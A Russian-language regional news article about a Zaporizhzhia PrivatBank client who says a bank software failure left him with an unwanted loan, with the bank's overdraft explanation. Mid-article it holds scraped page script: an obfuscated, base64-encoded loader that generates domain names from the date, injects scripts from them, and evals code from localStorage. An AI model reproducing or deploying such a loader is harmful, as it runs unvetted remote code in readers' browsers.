В Запорожье с одним из клиентов ПриватБанка произошел неприятный инцидент: в результате сбоя в программном обеспечении финансового учреждения он неожиданно для себя стал владельцем кредита, хотя предпочитает принципиально никогда не занимать.
Об этой ситуации пишет «Минфин», представляя мнения обеих сторон – клиента и банка.
Так, житель Запорожья, зайдя на сайт, увидел кредит, который на него повесили: «У меня принципиальное правило никогда не брать кредитов. Служба поддержки утверждает, что это из-за отрицательного баланса по счету. Но, как я писал в предыдущем посте, пару дней назад в банке произошел сбой, этот факт подтвердила их служба поддержки, она же уверяла, что процентов по кредитам не будет, что я могу дальше пользоваться счетом, что у меня с него деньги не списали. , а только зарезервировались. Несмотря на то, что я не пользовался этим счетом, уже ушли проценты. Выходит та же беда — меня делают виноватым в их ошибках».
В «ПриватБанке», в свою очередь, объяснили, что на карте может образоваться минусовый баланс, если раньше производилась оплата на определенном сайте и на момент авторизации средств было достаточно для оплаты, но сайт сразу не подтвердил списание зарезервированной суммы, поэтому деньги могли быть в доступном балансе и использоваться повторно клиентом. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
«В такой ситуации овердрафт является вынужденным мероприятием и необходимым механизмом, позволяющим корректно работать карточному счету и обслуживать его в соответствии с требованиями платежной системы», — отметили в финучреждении и добавили: «Дополнительно по вашему вопросу создана заявка на возврат средств. Она будет рассмотрена согласно регламенту международных платежных систем».
Однако ответ администрации, похоже, не удовлетворил клиента. «Снова перекрутили все с ног на голову. Разберемся в суде», — написал житель Запорожья. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/razberemsya-v-sude-zhitel-zaporozhya-pozhalovalsya-na-privatbank/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook